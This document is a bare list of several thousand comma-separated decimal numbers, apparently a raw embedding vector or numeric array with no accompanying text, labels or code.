-0.01918739452958107, 0.03107246197760105, 0.009353292174637318, 0.010540295392274857, -0.015062931925058365, 0.007970958016812801, 0.006881618872284889, -0.02150130271911621, -0.008128724060952663, -0.0012320801615715027, 0.005405376199632883, 0.014454403892159462, -0.004533905070275068, -0.014890139922499657, 0.0070318724028766155, 0.0072121769189834595, -0.031012360006570816, -0.015100494958460331, -0.007580298464745283, -0.010277352295815945, 0.016963640227913857, 0.0014433744363486767, -0.00030520278960466385, -0.02237277291715145, 0.028082413598895073, -0.020584754645824432, -0.01570151001214981, 0.03467854857444763, 0.009030246175825596, -0.0009104434284381568, 0.02477683126926422, 0.007580298464745283, 0.033957332372665405, 0.02564830332994461, 0.016753286123275757, 0.017744960263371468, -0.004684158600866795, -0.007538978476077318, -0.004492585081607103, 0.0118099395185709, 0.011096234433352947, -0.01624242216348648, -0.022312670946121216, -0.023379473015666008, 0.0008240475435741246, 0.010870854370296001, -0.005134919658303261, 0.012335827574133873, -0.0021711657755076885, 0.006532278843224049, 0.014424353837966919, -0.000265056878561154, 0.024085665121674538, -0.03401743248105049, -0.015062931925058365, -0.003846494248136878, 0.01396607980132103, 0.0016274352092295885, 0.007268521934747696, -0.030155913904309273, 0.020870236679911613, 0.02352972701191902, 0.00717836944386363, -0.0059087262488901615, -0.014183947816491127, -0.005889944266527891, 0.005082330666482449, 0.016482828184962273, -0.01906719245016575, -0.007692988496273756, -0.025558151304721832, 0.03179368004202843, -0.014003642834722996, -0.0052025336772203445, -0.003850250504910946, 0.005412888713181019, 0.015385976992547512, 0.0225831288844347, -0.012951867654919624, -0.00417329603806138, -0.0227934829890728, -0.033416420221328735, 0.002918677870184183, 0.00478557962924242, 0.01583673804998398, 0.036782100796699524, 0.005146188661456108, -0.006690045353025198, 0.010059484280645847, 0.005972583778202534, -0.010795727372169495, -0.008301516063511372, -0.014807499945163727, -0.023154092952609062, -0.006216746289283037, 0.016858462244272232, 0.014386789873242378, -0.00876730214804411, -0.009188012219965458, 0.0001794827257981524, -0.017474502325057983, -0.001833094866015017, -0.04231143742799759, 0.004894513636827469, -0.010750651359558105, 0.004195834044367075, 0.014476941898465157, -0.006137862801551819, -0.019082218408584595, 0.026129115372896194, -0.0015804809518158436, 0.010157149285078049, -0.0031271546613425016, 0.005172483157366514, 0.000059367812355048954, 0.0132598876953125, -0.009789027273654938, 0.007910856045782566, -0.019172370433807373, -0.0012978161685168743, 0.02267328090965748, 0.02022414654493332, -0.022613178938627243, 0.0414399653673172, 0.015175621956586838, -0.016392676159739494, -0.0037450729869306087, -0.007099486421793699, -0.008481820113956928, -0.01106618344783783, 0.029119163751602173, 0.03455834835767746, -0.020164044573903084, 0.019427800551056862, 0.0027627896051853895, -0.00894760712981224, -0.00705441040918231, -0.018826786428689957, 0.02644464746117592, 0.025663329288363457, -0.014905164949595928, 0.0068327863700687885, 0.025963835418224335, -0.01815064437687397, -0.004748016130179167, -0.016272474080324173, -0.016377652063965797, -0.0188568364828825, 0.020239170640707016, 0.020810134708881378, 0.007538978476077318, 0.03146312013268471, -0.0031403019092977047, -0.005412888713181019, 0.024506375193595886, 0.012756537646055222, 0.006160400807857513, 0.002646343084052205, 0.010637960396707058, 0.04567711800336838, 0.0070318724028766155, 0.03434799239039421, 0.010705574415624142, 0.03639144077897072, -0.010555321350693703, -0.025948811322450638, 0.001878170995041728, 0.0010527148842811584, -0.00527390418574214, -0.004541417583823204, -0.006475933827459812, 0.010517757385969162, -0.010750651359558105, 0.008256440050899982, -0.0157465860247612, -0.004409945569932461, 0.009022733196616173, -0.009924255311489105, -0.019938664510846138, 0.0023270538076758385, 0.0217567328363657, -0.025167491286993027, 0.004841925110667944, -0.00015577081649098545, 0.012974405661225319, -0.01021725032478571, 0.0022350235376507044, 0.00551055371761322, 0.02022414654493332, -0.008158775046467781, 0.009458469226956367, -0.02050962671637535, 0.025302719324827194, -0.0019664450082927942, 0.01756465621292591, 0.00757278548553586, -0.015123032964766026, 0.002815378364175558, -0.0010189077584072948, -0.029269417747855186, 0.02416079118847847, -0.02237277291715145, 0.014416840858757496, -0.007137049920856953, -0.006490958854556084, 0.011802426539361477, 0.017955314368009567, -0.011802426539361477, -0.004669133108109236, 0.009165474213659763, -0.00562324421480298, 0.006156644783914089, -0.025242619216442108, 0.00022479359176941216, 0.007238470949232578, 0.037323012948036194, 0.02772180363535881, 0.014717347919940948, -0.006171669811010361, 0.0017898969817906618, 0.0076892320066690445, 0.02267328090965748, 0.002073500771075487, 0.016603032127022743, -0.011839990504086018, 0.0034013676922768354, -0.0006911669624969363, 0.011366691440343857, 0.01162212248891592, -0.008564460091292858, -0.010427605360746384, -0.0003951202379539609, 0.0007827277877368033, -0.006070248782634735, -0.007276034448295832, -0.001936394372023642, -0.0018753537442535162, -0.017219072207808495, 0.013154709711670876, -0.011674711480736732, 0.013522831723093987, 0.01951795257627964, 0.010615422390401363, 0.025873683393001556, 0.003407002193853259, -0.0010320550063624978, 0.00442497106269002, 0.002982535632327199, -0.012794100679457188, -0.011426792480051517, 0.006201720796525478, -0.0049433461390435696, 0.004819386638700962, -0.019037142395973206, -0.005446696188300848, -0.018706584349274635, 0.0008127785404212773, -0.008429231122136116, -0.004740503616631031, 0.014213998802006245, 0.014950240962207317, 0.009608723223209381, -0.0027834493666887283, -0.016332576051354408, 0.008654612116515636, 0.003251114161685109, 0.011299076490104198, 0.0003239845100324601, -0.006637456361204386, -0.004075631033629179, 0.0027026880998164415, -0.03446819633245468, -0.000280082254903391, 0.009157962165772915, 0.0041582705453038216, -0.01259877160191536, -0.0024604040663689375, -0.031883832067251205, -0.0052025336772203445, 0.008594511076807976, -0.00918050017207861, -0.008624561131000519, -0.010157149285078049, -0.007001821417361498, -0.0038840577472001314, 0.01029989030212164, 0.007910856045782566, 0.00489827012643218, -0.013432678766548634, -0.006851567886769772, 0.016437752172350883, 0.019998764619231224, 0.024311045184731483, 0.00593502027913928, 0.014642220921814442, -0.007016846910119057, -0.0039366465061903, 0.022402824833989143, 0.0032191851641982794, -0.010810752399265766, 0.0019326379988342524, -0.009916743263602257, -0.003739438485354185, 0.0028059876058250666, 0.00951105821877718, 0.014552068896591663, -0.009969332255423069, -0.011562020517885685, 0.017369326204061508, -0.010239788331091404, 0.0021260895300656557, 0.012148010544478893, -0.010465169325470924, -0.004706696607172489, 0.0016330697108060122, -0.022808508947491646, 0.012613796629011631, -0.02213236689567566, -0.016422728076577187, -0.005732177756726742, 0.023514701053500175, 0.002441622316837311, -0.013868414796888828, -0.006220502313226461, -0.014416840858757496, -0.0023383230436593294, -0.0018697192426770926, 0.014612170867621899, -0.0009602149366401136, 0.027917133644223213, -0.0029769011307507753, -0.0008869662415236235, -0.016317550092935562, 0.009864154271781445, -0.018345974385738373, 0.005769741255789995, 0.011659685522317886, 0.0016462169587612152, -0.002011521253734827, -0.01723409816622734, 0.023484650999307632, -0.03062169998884201, 0.005739690735936165, 0.005318980198353529, -0.0013795166742056608, 0.01843612641096115, 0.017639782279729843, -0.00020119907276239246, 0.0035966974683105946, -0.01392100378870964, -0.005326493177562952, 0.020149018615484238, 0.007129537407308817, 0.0029337031301110983, 0.012531156651675701, 0.0033844641875475645, 0.022282620891928673, -0.01711389422416687, 0.0015260139480233192, 0.008301516063511372, 0.009473494254052639, 0.01288425363600254, 0.005352787207812071, 0.0024716730695217848, 0.01824079640209675, 0.005645782221108675, -0.014642220921814442, 0.011945167556405067, 0.017098868265748024, -0.00475552910938859, -0.009270652197301388, -0.006194207817316055, 0.025182517245411873, -0.0019288816256448627, -0.012298263609409332, 0.0017598462291061878, 0.000051679049647646025, -0.006089030299335718, 0.017384350299835205, 0.01806049235165119, 0.021846884861588478, -0.011178874410688877, -0.015205672942101955, 0.003929133992642164, -0.010337453335523605, -0.03927631303668022, -0.020644856616854668, -0.0165729820728302, -0.014116333797574043, 0.016798362135887146, 0.013597957789897919, 0.005427914205938578, 0.0040192860178649426, 0.015100494958460331, 0.01876668445765972, 0.013815825805068016, 0.004169539548456669, 0.0055030412040650845, 0.001075252890586853, 0.005206290166825056, 0.00938334222882986, 0.013981104828417301, -0.0019908612594008446, 0.0033375099301338196, 0.01392100378870964, -0.016603032127022743, 0.014634708873927593, -0.02138109877705574, -0.015115519985556602, -0.0024040588177740574, -0.008541922084987164, -0.008782328106462955, 0.012876740656793118, -0.0036229919642210007, -0.002725226106122136, 0.003985479008406401, 0.007163344416767359, -0.004845681134611368, 0.0015091104432940483, -0.004710453096777201, 0.007013090420514345, 0.00735491793602705, -0.007456338964402676, -0.0020096430089324713, -0.005683345720171928, -0.03146312013268471, -0.003816443495452404, 0.009157962165772915, 0.021531352773308754, -0.003947915509343147, 0.009338266216218472, -0.006137862801551819, -0.006889131385833025, 0.026549825444817543, -0.018255822360515594, 0.016422728076577187, 0.0020171557553112507, 0.00763664348050952, -0.011689736507833004, 0.013079582713544369, 0.02647469937801361, -0.002815378364175558, 0.009751464240252972, 0.0054429396986961365, 0.005893700756132603, 0.0038652759976685047, -0.0028604543767869473, -0.024085665121674538, 0.0031928906682878733, -0.004109438043087721, -0.00696050189435482, 0.016963640227913857, 0.0009785271249711514, -0.005747203249484301, -0.008376643061637878, -0.0078732930123806, -0.009608723223209381, 0.00029628147603943944, 0.005796035751700401, 0.00946598220616579, 0.012846689671278, 0.002708322601392865, 0.021456226706504822, 0.006498471833765507, -0.000027365538699086756, 0.004905782639980316, -0.0009480068110860884, -0.029179265722632408, -0.005600706208497286, -0.003012586385011673, 0.029449721798300743, 0.02328932099044323, -0.01798536628484726, 0.001361674047075212, -0.019698258489370346, 0.002420962555333972, -0.0058411117643117905, 0.01218557357788086, -0.021155718713998795, 0.007993496023118496, -0.01640770211815834, 0.01583673804998398, 0.004071875009685755, 0.00211857701651752, -0.004116951022297144, -0.0039328900165855885, 0.01017217431217432, -0.023394498974084854, 0.014454403892159462, -0.005326493177562952, 0.003850250504910946, -0.0038051744922995567, 0.0015842372085899115, -0.006269334815442562, 0.035279564559459686, 0.011426792480051517, -0.016002018004655838, -0.024912061169743538, -0.016723234206438065, -0.0006188573315739632, -0.02250800095498562, 0.00938334222882986, 0.012666385620832443, -0.00369248422794044, 0.020028816536068916, -0.02291368693113327, 0.0054016197100281715, -0.01218557357788086, -0.016257448121905327, 0.020539678633213043, 0.01547612901777029, 0.0007479815976694226, 0.0028491853736341, 0.0176097322255373, -0.009435931220650673, 0.0017645417246967554, 0.007723039481788874, 0.01373318675905466, 0.022763432934880257, -0.015506180003285408, -0.01869155839085579, -0.005476746708154678, 0.011734812520444393, -0.0067050703801214695, 0.010277352295815945, -0.016317550092935562, 0.014649733901023865, 0.03711266070604324, 0.0012790344189852476, -0.0045789810828864574, 0.009879179298877716, -0.001770176226273179, 0.00928567722439766, 0.02395043708384037, 0.012749024666845798, 0.012373390607535839, 0.003181621665135026, 0.035249512642621994, 0.03630128875374794, 0.015581307001411915, -0.016302524134516716, 0.002819134620949626, -0.0057885232381522655, 0.004830656107515097, 0.005893700756132603, 0.0037319257389754057, -0.011171361431479454, 0.011945167556405067, 0.017805062234401703, 0.0031534491572529078, 0.0028998961206525564, -0.00019802965107373893, 0.019953688606619835, -0.004759285598993301, 0.010930955410003662, -0.010870854370296001, 0.029359569773077965, -0.03747326880693436, 0.007276034448295832, -0.020404450595378876, -0.01873663440346718, -0.00015635773888789117, 0.012042832560837269, -0.013643034733831882, -0.0028397946152836084, -0.002892383374273777, -0.009931768290698528, -0.0030989821534603834, 0.0013766993070021272, 0.013793287798762321, -0.00423715403303504, -0.002287612296640873, 0.016137246042490005, 0.022117342799901962, -0.010555321350693703, -0.02519754320383072, -0.001652790466323495, -0.017970340326428413, 0.01280161365866661, -0.006787709891796112, 0.012132984586060047, -0.009060297161340714, -0.010097047314047813, 0.012508618645370007, 0.017850138247013092, 0.01251613162457943, 0.016377652063965797, -0.03290555626153946, 0.007820704020559788, -0.008241414092481136, 0.021366072818636894, 0.011486894451081753, 0.0076103489845991135, -0.011051158420741558, 0.0030614188872277737, 0.012050345540046692, -0.018541304394602776, -0.007200907915830612, -0.031102512031793594, -0.00614161929115653, -0.00969887524843216, -0.007940907031297684, 0.038885653018951416, -0.0011691615218296647, 0.0033093374222517014, -0.009683850221335888, 0.0013973593013361096, 0.003891570260748267, -0.030892157927155495, 0.013658059760928154, 0.021681606769561768, -0.007925882004201412, -0.020043840631842613, -0.005619487725198269, 0.006558573339134455, -0.017369326204061508, -0.009473494254052639, 0.019788410514593124, -0.005946289282292128, -0.01756465621292591, -0.02150130271911621, 0.006678776349872351, -0.012448517605662346, 0.016272474080324173, 0.007674206979572773, 0.005942533258348703, -0.017369326204061508, -0.0023721300531178713, 0.0024265970569103956, 0.02300383895635605, 0.006419588346034288, -0.016152270138263702, -0.011501919478178024, 0.043483417481184006, 0.015971966087818146, -0.005394107196480036, -0.005980096757411957, -0.013973592780530453, 0.000923590618185699, 0.02821764163672924, 0.008136237040162086, 0.0009944915072992444, 0.01307207066565752, 0.0006010147044435143, 0.03057662397623062, 0.030802004039287567, -0.02503226324915886, -0.004988422151654959, -0.00275527685880661, -0.003872788744047284, 0.01909724250435829, -0.0034558346960693598, 0.007538978476077318, 0.026700079441070557, 0.0027064443565905094, -0.003951671998947859, 0.01827084831893444, 0.002176800277084112, 0.00381832174025476, -0.014935215935111046, 0.00009725404379423708, 0.0033525351900607347, -0.0046578641049563885, 0.009255627170205116, -0.020524652674794197, 0.004038067534565926, -0.006584867835044861, -0.003275530179962516, -0.02663997747004032, 0.005889944266527891, 0.01666313409805298, -0.01645277813076973, 0.00924060121178627, 0.0034013676922768354, 0.0013663694262504578, -0.006137862801551819, -0.005578167736530304, 0.004552686586976051, 0.025633277371525764, 0.00936831720173359, -0.017429426312446594, -0.011862528510391712, -0.019998764619231224, -0.007046897895634174, 0.010044458322227001, -0.0016274352092295885, -0.023935411125421524, -0.0038577632512897253, 0.034708600491285324, -0.012749024666845798, -0.018826786428689957, -0.02788708359003067, 0.021486276760697365, 0.021576428785920143, 0.006821517366915941, 0.01336506474763155, 0.0007808496011421084, -0.016963640227913857, 0.0026820283383131027, 0.03446819633245468, 0.006074005272239447, -0.0044587780721485615, 0.03618108853697777, -0.017910238355398178, 0.02781195566058159, 0.02133602276444435, -0.009721413254737854, -0.006603649351745844, 0.007253496441990137, 0.021786784753203392, 0.006051467265933752, -0.0033074591774493456, -0.04648848995566368, -0.0020396937616169453, 0.010247301310300827, -0.013169735670089722, -0.013575419783592224, -0.014784961938858032, 0.0037751237396150827, 0.0005028803134337068, -0.020073892548680305, -0.020900286734104156, 0.0026576120872050524, 0.00445502158254385, 0.013199785724282265, -0.024897035211324692, 0.010765676386654377, 0.0049170516431331635, 0.029404645785689354, -0.031132562085986137, -0.006840298883616924, -0.014612170867621899, -0.01011207327246666, 0.013868414796888828, -0.005919995252043009, 0.006614918354898691, -0.016182322055101395, 0.011036133393645287, -0.0025486780796200037, -0.004774310626089573, 0.010254813358187675, 0.006021416280418634, -0.002244414296001196, -0.005615731235593557, 0.0012921816669404507, -0.010457656346261501, -0.01050273235887289, 0.013928516767919064, 0.0027665458619594574, 0.01562638208270073, 0.011486894451081753, 0.005634513217955828, 0.003136545652523637, -0.004601519089192152, -0.04201092943549156, -0.018180696293711662, -0.016873488202691078, -0.029269417747855186, 0.002165531273931265, 0.00025355309480801225, -0.003803296247497201, 0.002347713802009821, 0.010036946274340153, 0.023214193060994148, 0.017549630254507065, -0.0007803800399415195, -0.002982535632327199, 0.023935411125421524, 0.010750651359558105, -0.017714908346533775, -0.010127098299562931, -0.011967705562710762, -0.02059978060424328, -0.003782636485993862, -0.008211364038288593, -0.01392100378870964, 0.0113967414945364, -0.028277743607759476, -0.0061078122816979885, 0.001862206612713635, -0.004109438043087721, 0.006727608852088451, 0.0001311198138864711, -0.0066862888634204865, -0.0323345921933651, -0.01500282995402813, 0.017098868265748024, 0.03912605717778206, -0.012208111584186554, 0.04552686586976051, -0.022102316841483116, -0.01298943068832159, -0.006453395821154118, 0.011749837547540665, 0.022387798875570297, -0.000132528439280577, -0.034708600491285324, 0.021020490676164627, -0.02121582068502903, -0.01321481168270111, 0.010427605360746384, 0.0001285373291466385, -0.009871667250990868, 0.014033693820238113, 0.01649785414338112, -0.0005888066370971501, 0.0010095168836414814, -0.018781710416078568, -0.011171361431479454, 0.005082330666482449, 0.0008245171047747135, -0.0005568776978179812, 0.029735203832387924, 0.005232584662735462, 0.027421297505497932, -0.003921621013432741, 0.012373390607535839, -0.00696050189435482, 0.012523644603788853, 0.01415389683097601, -0.006472177337855101, -0.004086900036782026, -0.008278978057205677, -0.014033693820238113, 0.009526083245873451, -0.009593697264790535, 0.007445069961249828, 0.024761807173490524, -0.018541304394602776, -0.006261822301894426, -0.004432483576238155, -0.0026294393464922905, 0.02477683126926422, 0.006641212850809097, -0.002683906350284815, 0.02552810125052929, -0.013515318743884563, -0.003269895678386092, -0.0027796931099146605, 0.0006676897755824029, 0.025287695229053497, 0.0011785522801801562, 0.0113967414945364, -0.0005226010689511895, 0.0034107586834579706, 0.005431670695543289, -0.016648108139634132, -0.006412075832486153, -0.0001493145973654464, -0.00623552780598402, -0.02576850727200508, -0.007208420429378748, 0.024972161278128624, 0.009676337242126465, -0.015941916033625603, -0.006768928375095129, -0.015205672942101955, 0.0025975105818361044, 0.016678158193826675, -0.03639144077897072, -0.002043450018391013, -0.03236464411020279, -0.0053828381933271885, 0.014461916871368885, 0.0011391107691451907, -0.008985170163214207, -0.018511254340410233, -0.016918564215302467, -0.013327501714229584, 0.011359178461134434, -0.007095729932188988, 0.004751772619783878, 0.004207103047519922, -0.011441817507147789, -0.00034652254544198513, -0.02449135109782219, -0.00019967305706813931, -0.02121582068502903, 0.024882009252905846, 0.013951054774224758, -0.03017093986272812, -0.010412580333650112, 0.028247691690921783, -0.0022030945401638746, 0.015986992046236992, -0.004094413015991449, -0.00824892707169056, -0.015971966087818146, 0.02038942463696003, -0.0078732930123806, 0.002785327611491084, -0.0019476633751764894, -0.019953688606619835, 0.002935581374913454, -0.023634904995560646, -0.04441498965024948, -0.00244913506321609, 0.016107194125652313, -0.0013109634164720774, -0.00001471723044232931, -0.0007846059743314981, -0.015971966087818146, -0.007339892443269491, 0.02100546471774578, 0.005187508184462786, 0.025257643312215805, -0.011637147516012192, -0.011749837547540665, -0.004838168621063232, -0.008797353133559227, -0.0017955314833670855, -0.007745577488094568, -0.006472177337855101, -0.013485267758369446, -0.007768115494400263, -0.016302524134516716, -0.006671263370662928, 0.0049170516431331635, 0.003769489238038659, 0.015047905966639519, -0.011231462471187115, 0.014687297865748405, 0.006276847794651985, 0.006502228323370218, 0.003256748663261533, -0.0014668515650555491, -0.0028379163704812527, -0.003373195184394717, 0.027947185561060905, -0.0024622823111712933, -0.016467804089188576, -0.0023364447988569736, -0.005690858233720064, 0.002362739061936736, -0.0039366465061903, 0.020314298570156097, 0.006096543278545141, -0.009894205257296562, 0.01124648842960596, -0.022928711026906967, 0.012238162569701672, 0.009743951261043549, -0.006994308903813362, 0.012779075652360916, 0.003360047936439514, -0.0022350235376507044, -0.00038666845648549497, -0.010495219379663467, 0.002360861049965024, 0.023154092952609062, -0.0018124349880963564, -0.02593378536403179, 0.015506180003285408, 0.008241414092481136, -0.00008492854976793751, 0.018451152369379997, -0.03000565990805626, 0.018586380407214165, 0.022072266787290573, 0.028157539665699005, 0.006648725364357233, 0.0035121797118335962, 0.02328932099044323, 0.004327306058257818, 0.005446696188300848, -0.01255369558930397, 0.010810752399265766, 0.014086282812058926, 0.017579680308699608, 0.0017232219688594341, 0.012906791642308235, 0.0003044984769076109, 0.012951867654919624, 0.013395115733146667, 0.003784514730796218, 0.0042784735560417175, -0.031342919915914536, -0.005495528224855661, 0.0061002993024885654, -0.005739690735936165, 0.02743632160127163, 0.01996871456503868, 0.0011550751514732838, -0.016723234206438065, -0.0037169004790484905, 0.017504554241895676, 0.013192273676395416, 0.006690045353025198, -0.00924060121178627, 0.00599887827411294, -0.003016342641785741, -0.0033525351900607347, 0.01552120503038168, -0.017714908346533775, -0.021651554852724075, -0.004819386638700962, 0.008827404119074345, -0.014304150827229023, 0.0019927395042032003, -0.009007708169519901, 0.007245983928442001, 0.024416223168373108, 0.006333192810416222, -0.002176800277084112, -0.015776636078953743, -0.015010342933237553, 0.0065059843473136425, 0.021200794726610184, -0.009203038178384304, -0.0055631427094340324, -0.006904156878590584, 0.01500282995402813, -0.007339892443269491, -0.00257497257553041, 0.00263695209287107, -0.011028620414435863, 0.014138871803879738, 0.001180430524982512, -0.012846689671278, 0.00021411149646155536, -0.016603032127022743, 0.019923638552427292, -0.015716535970568657, -0.00030332463211379945, -0.011832477524876595, 0.01410882081836462, -0.0057021272368729115, -0.012313289567828178, -0.012636334635317326, -0.003003195393830538, 0.020254196599125862, 0.011607096530497074, -0.01723409816622734, 0.006472177337855101, 0.010983544401824474, 0.018826786428689957, -0.030110837891697884, 0.02126089669764042, 0.007888318039476871, 0.010021920315921307, -0.011464355513453484, 0.022688306868076324, -0.015220697969198227, -0.0004986543790437281, 0.015100494958460331, -0.0017279173480346799, -0.006521009840071201, -0.0010048215044662356, 0.010104560293257236, -0.002454769564792514, 0.00029581194394268095, -0.009473494254052639, 0.0014499480603262782, -0.007723039481788874, -0.005893700756132603, 0.011118772439658642, 0.011366691440343857, -0.02029927261173725, -0.009233089163899422, -0.0037319257389754057, 0.005420401692390442, 0.001652790466323495, 0.022568102926015854, -0.005645782221108675, 0.005972583778202534, 0.006197964306920767, -0.007925882004201412, 0.01786516234278679, 0.006408319342881441, -0.004327306058257818, 0.0061002993024885654, 0.01583673804998398, -0.012035319581627846, -0.002182434778660536, -0.009210551157593727, -0.014612170867621899, 0.01612222008407116, 0.018916938453912735, 0.008692175149917603, 0.007197151426225901, -0.009308215230703354, -0.007268521934747696, -0.0032342104241251945, -0.019112268462777138, 0.009713900275528431, 0.008361617103219032, 0.027541499584913254, -0.007215932942926884, -0.003119642147794366, -0.002227510791271925, -0.01956302858889103, 0.009586185216903687, -0.00620547728613019, 0.007516440469771624, 0.008955119177699089, -0.016227398067712784, 0.024356121197342873, 0.019953688606619835, -0.01298943068832159, 0.017504554241895676, 0.024190843105316162, -0.008068623021245003, 0.02133602276444435, -0.009481007233262062, -0.0013569785514846444, 0.011787401512265205, -0.03530961647629738, 0.0020077647641301155, 0.016377652063965797, -0.01607714407145977, 0.01359044574201107, 0.0010996691416949034, -0.02246292494237423, 0.00590496975928545, -0.002377764554694295, -0.005796035751700401, -0.00314969290047884, 0.015198159962892532, 0.004075631033629179, 0.0005395046318881214, -0.0020847697742283344, -0.05327995494008064, 0.017023742198944092, 0.004045580513775349, 0.017714908346533775, 0.015881814062595367, -0.016377652063965797, 0.025753481313586235, 0.006599892862141132, 0.02644464746117592, -0.011193899437785149, 0.00969887524843216, -0.010074509307742119, -0.007298572454601526, 0.006983039900660515, -0.0019570542499423027, 0.008602023124694824, 0.019908612594008446, -0.009849129244685173, -0.0118099395185709, -0.0018349731108173728, 0.0023965463042259216, 0.0036436517257243395, -0.034588396549224854, 0.0032661394216120243, 0.024671655148267746, -0.007460095454007387, 0.012358365580439568, 0.0061679137870669365, -0.011817452497780323, -0.014905164949595928, -0.004706696607172489, 0.0036361392121762037, -0.010976031422615051, -0.004297255538403988, 0.0012029685312882066, -0.013154709711670876, -0.0007634765352122486, -0.003191012656316161, -0.01330496370792389, 0.025888709351420403, -0.013087095692753792, 0.013199785724282265, 0.015926890075206757, 0.003914108499884605, 0.01718902215361595, -0.026038963347673416, 0.00026388303376734257, 0.0033262409269809723, 0.0069717708975076675, -0.011366691440343857, 0.007948420010507107, -0.008955119177699089, 0.006678776349872351, -0.01923247054219246, 0.010945980437099934, 0.011231462471187115, -0.005679589230567217, -0.01690354011952877, 0.0008245171047747135, -0.0002904121938627213, 0.006922938395291567, 0.0007245044689625502, -0.008955119177699089, -0.006089030299335718, -0.0064458828419446945, 0.015716535970568657, 0.011494406498968601, 0.02486698515713215, -0.006190451793372631, 0.010209737345576286, -0.003395733190700412, -0.0067050703801214695, 0.0028266473673284054, -0.009533596225082874, 0.008256440050899982, -0.0037150222342461348, 0.0033412661869078875, 0.012576233595609665, 0.015025367960333824, 0.021290946751832962, 0.0196832325309515, 0.012072883546352386, -0.012373390607535839, -0.007099486421793699, -0.007632886990904808, -0.0017598462291061878, -0.023364447057247162, 0.02536282129585743, -0.01415389683097601, 0.017143944278359413, -0.006693801376968622, -0.0010123341344296932, -0.0003054375702049583, -0.01777501031756401, -0.00672385236248374, 0.014221510849893093, 0.002828525612130761, 0.006592380348592997, -0.01058537233620882, -0.010149636305868626, -0.012200598604977131, -0.00913542415946722, 0.003944159019738436, -0.010998569428920746, -0.01803044229745865, 0.004669133108109236, 0.015491154976189137, -0.009090348146855831, 0.0008827403653413057, -0.02196708880364895, 0.008256440050899982, 0.019217446446418762, 0.005491772200912237, -0.036691948771476746, -0.014446891844272614, -0.0029167996253818274, 0.01135166548192501, 0.01369562279433012, -0.01628750003874302, -0.016918564215302467, 0.010472681373357773, 0.0027759368531405926, 0.007963445037603378, -0.0013344405451789498, 0.010427605360746384, -0.01096100639551878, -0.0011578924022614956, -0.0011860650265589356, -0.030862106010317802, 0.0009555194992572069, 0.0314931720495224, 0.007343648932874203, -0.005833599250763655, 0.01715897023677826, 0.010758163407444954, -0.002291368553414941, 0.017669832333922386, -0.022643228992819786, 0.013973592780530453, -0.012764050625264645, -0.010675524361431599, -0.017008716240525246, 0.027962209656834602, 0.00092312105698511, -0.006400806829333305, -0.005488015711307526, 0.004845681134611368, 0.00223690178245306, 0.008812378160655499, 0.0006822456489317119, 0.005247609689831734, 0.0035084234550595284, -0.005225071683526039, 0.0022650742903351784, 0.011839990504086018, 0.01073562540113926, 0.006333192810416222, -0.008564460091292858, 0.0027759368531405926, 0.0023251757957041264, 0.013710648752748966, 0.009909230284392834, 0.0010076387552544475, 0.020254196599125862, -0.0007761541637592018, 0.01876668445765972, -0.008361617103219032, 0.014664758928120136, -0.009706388227641582, 0.01232831459492445, 0.020569728687405586, 0.0132598876953125, -0.01311714667826891, 0.012095421552658081, -0.0132598876953125, 0.0005883370758965611, 0.013139684684574604, -0.012591258622705936, 0.008797353133559227, -0.013462729752063751, 0.004368625581264496, -0.008429231122136116, 0.007482633460313082, -0.029900481924414635, -0.028698453679680824, -0.004928320646286011, -0.008324054069817066, 0.02126089669764042, -0.022342722862958908, -0.011637147516012192, 0.015596332028508186, 0.021846884861588478, 0.010284864343702793, 0.00681776087731123, 0.01102110743522644, 0.012921816669404507, 0.004766798112541437, 0.0015945672057569027, -0.02043450064957142, 0.0056420257315039635, -0.008151262067258358, 0.024716731160879135, -0.008571972139179707, 0.013628008775413036, 0.007599079981446266, -0.010600397363305092, 0.0030501496512442827, 0.007298572454601526, 0.013094608671963215, 0.0063256798312067986, 0.01819572038948536, -0.000545608694665134, -0.008218876086175442, 0.0020997952669858932, 0.010367504321038723, 0.009924255311489105, 0.022312670946121216, 0.0113967414945364, -0.0025787288323044777, 0.0196832325309515, 0.0009024611790664494, 0.005514310207217932, 0.010991056449711323, 0.019998764619231224, 0.010562833398580551, -0.008872480131685734, 0.0003923029871657491, 0.017414402216672897, 0.020329322665929794, 0.022237544879317284, 0.002648221096023917, -0.022568102926015854, 0.007584054488688707, 0.013688110746443272, 0.018721608445048332, 0.021861910820007324, 0.011163848452270031, -0.026053989306092262, -0.010450143367052078, -0.008339079096913338, 0.016873488202691078, -0.010044458322227001, -0.00023312798293773085, -0.014401815831661224, -0.021320996806025505, 0.0033431444317102432, 0.05772746354341507, 0.012996943667531013, -0.023589828982949257, -0.017519580200314522, 0.0014781205682083964, 0.04080890119075775, -0.042912453413009644, 0.006618674844503403, 0.0061679137870669365, 0.010344966314733028, -0.0005183751927688718, 0.0006902278400957584, 0.0042596920393407345, 0.022943736985325813, 0.00036553904647007585, 0.00039746795664541423, 0.011734812520444393, 0.004616544581949711, 0.00942841824144125, -0.007580298464745283, -0.0003667128912638873, -0.007970958016812801, 0.01930759847164154, 0.001695988466963172, 0.00040779789560474455, -0.01824079640209675, 0.00019650364993140101, 0.003433296689763665, -0.017083844169974327, -0.011697249487042427, 0.003395733190700412, 0.013417653739452362, -0.006043954286724329, 0.013011968694627285, -0.005059792660176754, 0.007366186939179897, -0.012546182610094547, -0.008594511076807976, -0.00834659207612276, 0.01661805808544159, -0.0013823339249938726, -0.007730551995337009, -0.0002936990058515221, 0.012861715629696846, -0.015431053005158901, 0.006964258383959532, 0.01789521425962448, -0.004958371631801128, -0.010209737345576286, 0.007505171466618776, -0.0057885232381522655, 0.009090348146855831, -0.009894205257296562, 0.007339892443269491, -0.009691362269222736, 0.012230649590492249, -0.01645277813076973, -0.00009097391011891887, -0.0012179939076304436, 0.005634513217955828, -0.00022573268506675959, 0.006532278843224049, 0.013973592780530453, 0.0003826773609034717, 0.004496341571211815, -0.010750651359558105, -0.01756465621292591, 0.01902211643755436, -0.011501919478178024, -0.0010104560060426593, 0.00019849919772241265, -0.00872222613543272, 0.005472990218549967, 0.0013804556801915169, 0.011441817507147789, 0.012749024666845798, -0.014717347919940948, -0.01247105561196804, -0.013049532659351826, -0.0028059876058250666, 0.021396124735474586, -0.026459673419594765, 0.007475120481103659, 0.023018864914774895, 0.022477950900793076, 0.010097047314047813, -0.0227934829890728, 0.004327306058257818, -0.015761611983180046, -0.005157457664608955, -0.004263448063284159, -0.02821764163672924, -0.02340952306985855, -0.005146188661456108, 0.04122960940003395, -0.008369130082428455, -0.01218557357788086, 0.014078769832849503, 0.013387602753937244, -0.007655424997210503, 0.018496228381991386, 0.020975414663553238, 0.0018838054966181517, 0.014634708873927593, -0.0073098414577543736, 0.012365877628326416, 